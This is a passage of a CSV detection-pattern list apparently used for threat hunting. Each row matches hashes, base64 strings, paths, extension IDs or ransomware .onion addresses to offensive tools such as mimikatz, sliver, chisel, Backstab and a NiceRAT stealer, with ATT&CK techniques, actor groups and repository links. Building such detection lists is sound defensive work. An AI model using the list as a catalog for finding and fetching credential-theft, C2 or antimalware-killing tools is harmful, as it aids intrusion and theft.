"*bf64fa06291007eab0b142b91ee7ce9ab9657ddda240d98c141a0555da90cb4a*",".{0,1000}bf64fa06291007eab0b142b91ee7ce9ab9657ddda240d98c141a0555da90cb4a.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","35862"
"*bf7004986efeeea71925695379ab87a74e22cb0bdab80e960fdeea8ce297fb9e*",".{0,1000}bf7004986efeeea71925695379ab87a74e22cb0bdab80e960fdeea8ce297fb9e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35864"
"*bf7120a63483a2e4300a4d1405ac7525f11dd1f6d6a7120767bc42566da35891*",".{0,1000}bf7120a63483a2e4300a4d1405ac7525f11dd1f6d6a7120767bc42566da35891.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","35865"
"*bf718d8a798eb9c98c107dd999d82a9326f152cd3db9a50d7b776f6a29033631*",".{0,1000}bf718d8a798eb9c98c107dd999d82a9326f152cd3db9a50d7b776f6a29033631.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35866"
"*bf775ff84feda3935567eef986049ee3049f4533482594de7258eed927c7a270*",".{0,1000}bf775ff84feda3935567eef986049ee3049f4533482594de7258eed927c7a270.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35867"
"*bf7b774ef4abcd725e9d3a3ee569f83db21b2248056fcb3642099b005c089b6a*",".{0,1000}bf7b774ef4abcd725e9d3a3ee569f83db21b2248056fcb3642099b005c089b6a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","35868"
"*bf8830d8ce61d2cb357a1f8a394f3220f9eaa02f436ab4bd98edb567b149c754*",".{0,1000}bf8830d8ce61d2cb357a1f8a394f3220f9eaa02f436ab4bd98edb567b149c754.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","35869"
"*bf99eb1afc5b916e63a5b1ff607a8d79012ada12a2bbbb3ca9be3921dc16cfaa*",".{0,1000}bf99eb1afc5b916e63a5b1ff607a8d79012ada12a2bbbb3ca9be3921dc16cfaa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35874"
"*bfa10eedfa3929b6a243b10035b9b29b7c84d87a1632e81dbc0d8ab1461f6c93*",".{0,1000}bfa10eedfa3929b6a243b10035b9b29b7c84d87a1632e81dbc0d8ab1461f6c93.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35876"
"*bfa29dd2bd1a62ce4133eca34faa6f46005557eea07f3bf5c8b4afce8006160d*",".{0,1000}bfa29dd2bd1a62ce4133eca34faa6f46005557eea07f3bf5c8b4afce8006160d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","35877"
"*bfa3e36c356afe0742ffc32a3693257aacf59a671b07f695e31bd0f334fe0421*",".{0,1000}bfa3e36c356afe0742ffc32a3693257aacf59a671b07f695e31bd0f334fe0421.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","#filehash","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","35878"
"*bfa9dc4c4b911b6777cb98d17a82b28531c26600698699cbe658749684818f28*",".{0,1000}bfa9dc4c4b911b6777cb98d17a82b28531c26600698699cbe658749684818f28.{0,1000}","offensive_tool_keyword","PWA-Phishing","Phishing with Progressive Web Apps and UI manipulation","T1071.003 - T1204.002 - T1608.003 - T1071.004","TA0006","N/A","N/A","Phishing","https://github.com/mrd0x/PWA-Phishing","1","0","#filehash","N/A","10","3","288","52","2024-06-16T17:47:15Z","2024-06-09T19:47:52Z","35879"
"*bfb4bd6ad9c59495256db7188a390d462d4e6edef6e7c33e403d6ed5808651f5*",".{0,1000}bfb4bd6ad9c59495256db7188a390d462d4e6edef6e7c33e403d6ed5808651f5.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","35880"
"*bfb894897287d8652d9aca74ece09adb061de853ed9b7707c1f72533cd22598f*",".{0,1000}bfb894897287d8652d9aca74ece09adb061de853ed9b7707c1f72533cd22598f.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","35881"
"*bfb8f5783cc99fc57d9f2bc9f16229a6a0412017a5c215e0c76d70dd72ed7ce1*",".{0,1000}bfb8f5783cc99fc57d9f2bc9f16229a6a0412017a5c215e0c76d70dd72ed7ce1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35883"
"*bfc69bfe997864b9ed4fda70da541e4fbed3c9e05206d924d3a511a217dec83f*",".{0,1000}bfc69bfe997864b9ed4fda70da541e4fbed3c9e05206d924d3a511a217dec83f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35885"
"*bfc94b31d4035a538e8ac59560846fbca0b0ad43a2e000e569b6d73ca2991341*",".{0,1000}bfc94b31d4035a538e8ac59560846fbca0b0ad43a2e000e569b6d73ca2991341.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","35886"
"*bfca678c800832025fe5e7c59bdf9bc3a2a62c77e7b689b943fee2821c2fec19*",".{0,1000}bfca678c800832025fe5e7c59bdf9bc3a2a62c77e7b689b943fee2821c2fec19.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","#filehash","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","35887"
"*bfd47d67a9d56cc3612fb0b5e92b048ed6d5ab1058efd7d25c03fc74698d002f*",".{0,1000}bfd47d67a9d56cc3612fb0b5e92b048ed6d5ab1058efd7d25c03fc74698d002f.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","35889"
"*bfd8c2639bfe925869dbd7c0ee8ca9901e6939ea07fe52a2c469b1bf12c002a3*",".{0,1000}bfd8c2639bfe925869dbd7c0ee8ca9901e6939ea07fe52a2c469b1bf12c002a3.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","35890"
"*bfe2e4b99edec9921d20bc7f956c1ac48cfc0b08061e23c92ab3461d7cdcf922*",".{0,1000}bfe2e4b99edec9921d20bc7f956c1ac48cfc0b08061e23c92ab3461d7cdcf922.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","#filehash","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","35892"
"*bfe6da625226d373022fe4c5f88ccfdbae6c102207b5a44d6aff3c5aed20a56d*",".{0,1000}bfe6da625226d373022fe4c5f88ccfdbae6c102207b5a44d6aff3c5aed20a56d.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","35893"
"*bfe768938d3186ff5a221c06902e18c4e67aa4d7c11b07aa54aeeb3746e31efe*",".{0,1000}bfe768938d3186ff5a221c06902e18c4e67aa4d7c11b07aa54aeeb3746e31efe.{0,1000}","offensive_tool_keyword","Dispossessor","Bruteforce tools used by Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","35894"
"*bfee4c895d0f713cfc7c1a2f967ad8fdffc92c470e0edb8f0125959514445138*",".{0,1000}bfee4c895d0f713cfc7c1a2f967ad8fdffc92c470e0edb8f0125959514445138.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35896"
"*bff5c33032fc4d1a25a3a569e72910b2dc500caf44b0d0baac16c4abd3868998*",".{0,1000}bff5c33032fc4d1a25a3a569e72910b2dc500caf44b0d0baac16c4abd3868998.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","0","#filehash","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","35897"
"*bfnaelmomeimhlpmgjnjophhpkkoljpa*",".{0,1000}bfnaelmomeimhlpmgjnjophhpkkoljpa.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","35901"
"*bG9nb25QYXNzd29yZHM=*",".{0,1000}bG9nb25QYXNzd29yZHM\=.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","35902"
"*bG9nb25QYXNzd29yZHM=*",".{0,1000}bG9nb25QYXNzd29yZHM\=.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","35903"
"*bgetprivs*",".{0,1000}bgetprivs.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35904"
"*bhashdump*",".{0,1000}bhashdump.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35905"
"*bhd_enum_dconly*",".{0,1000}bhd_enum_dconly.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","35906"
"*bhghoamapcdpbohphigoooaddinpkbai*",".{0,1000}bhghoamapcdpbohphigoooaddinpkbai.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","35907"
"*bhhhlbepdkbapadjdnnojkbgioiodbic*",".{0,1000}bhhhlbepdkbapadjdnnojkbgioiodbic.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","35908"
"*bHNhc3MuZXhl*",".{0,1000}bHNhc3MuZXhl.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","#base64","base64 lsass.exe","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","35909"
"*bhttp_x64.dll*",".{0,1000}bhttp_x64\.dll.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35911"
"*bHVrZXJlYWxseWlzdGhlbWFubXl0aGFuZGxlZ2VuZA*",".{0,1000}bHVrZXJlYWxseWlzdGhlbWFubXl0aGFuZGxlZ2VuZA.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","35912"
"*bianlianlbc5an4kgnay3opdemgcryg2kpfcbgczopmm3dnbz3uaunad.onion*",".{0,1000}bianlianlbc5an4kgnay3opdemgcryg2kpfcbgczopmm3dnbz3uaunad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","35913"
"*bianlivemqbawcco4cx4a672k2fip3guyxudzurfqvdszafam3ofqgqd.onion*",".{0,1000}bianlivemqbawcco4cx4a672k2fip3guyxudzurfqvdszafam3ofqgqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","35914"
"*bigb0sss/goPassGen*",".{0,1000}bigb0sss\/goPassGen.{0,1000}","offensive_tool_keyword","goPassGen","Easily-guessable Password Generator for Password Spray Attack","T1110 - T1110.003","TA0006 ","N/A","N/A","Exploitation tool","https://github.com/bigb0sss/goPassGen","1","1","N/A","N/A","8","1","21","1","2020-06-04T23:13:44Z","2020-06-04T22:33:37Z","35916"
"*bin/*/PS2EXE/*",".{0,1000}bin\/.{0,1000}\/PS2EXE\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","35921"
"*bin/addusertogroup.x64*",".{0,1000}bin\/addusertogroup\.x64.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","35922"
"*bin/bof_c.o*",".{0,1000}bin\/bof_c\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - 